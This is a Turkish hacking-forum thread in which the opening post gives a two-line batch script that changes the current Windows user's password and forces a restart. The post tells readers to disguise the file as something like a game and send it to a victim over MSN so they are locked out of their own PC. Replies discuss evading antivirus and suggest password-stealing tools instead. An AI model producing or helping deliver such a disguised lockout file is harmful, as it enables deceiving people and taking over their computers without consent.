msn den karşı tarafın pc sine şifre koyma !!

CyberLocalTake

Katılımcı Üye
7 Şub 2010
351
0
İstanbul
ilk olarak yeni not defteri açıyoruz
sonrada verdiğim kodları yazıyoruz ve uzantısını .bat olarak kaydediyoruz (örnek: oyun.bat)
code:

net user %username% 123456
shutdown -r

bu komutta 123456 yazılı kısım kişinin pc ye koyacagımız şifredir siz deiştirip istediğiniz bir şifreyi koyabilirsiniz

şimdii gelelim kullanıma
verdiğim komutları yazıp .bat olarak kaydetikten sonra oluşan programı msnden karşıtarafa bişekile kabul ettirip yolluyorsunuz adam alınca çıft tıkladığı anda pc'ye şifre yerleşiyor ve pc otomatik olarak kapanıyor bu kapamayı kişi durduramaz ve pc açıldıında şifre sorucak

hadi kolay gelsin !!! :yaho1

B0Z0

Uzman üye
20 Kas 2009
1,567
0
ELAZIĞ
Bunları anti yakalar genel güvenlikte konu açtım bunları antilerden kaçırma için yöntem ::)

cixman

Yeni üye
23 Ara 2009
3
0
çok kolay bir şekilde şifreyi kaldırır bunlar işe yaramaz.sonuçta yedirmek lazım ona bakılırsa piyasada bir sürü server oluşturucu var bütün şifrelerini almak varken windowsu sildirmek varken bunu kimse yapmaz.sonuçta diğeri hem daha inandırıcı hemde sonuç olarak şifrelerini ele geçirebilirsiniz.

Changes*

Yeni üye
8 Şub 2010
4
0
Çok güzel olmuşta ben şu sıkıştırma işini anlamadım nereye neyi sıkıştırcaz yeniyim yardım edin :)

Son düzenleme:

BadTaste

Yeni üye
10 Haz 2010
42
0
Ya arkadaşlar ben bunu yaptım bidahada yapmamaya yemın ettımmmmm arkadaş rizde oturuyor ama ben ona ulaşamıyorum telde yok valla ulaşamıycağınız kişi varsa yapmayın...

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.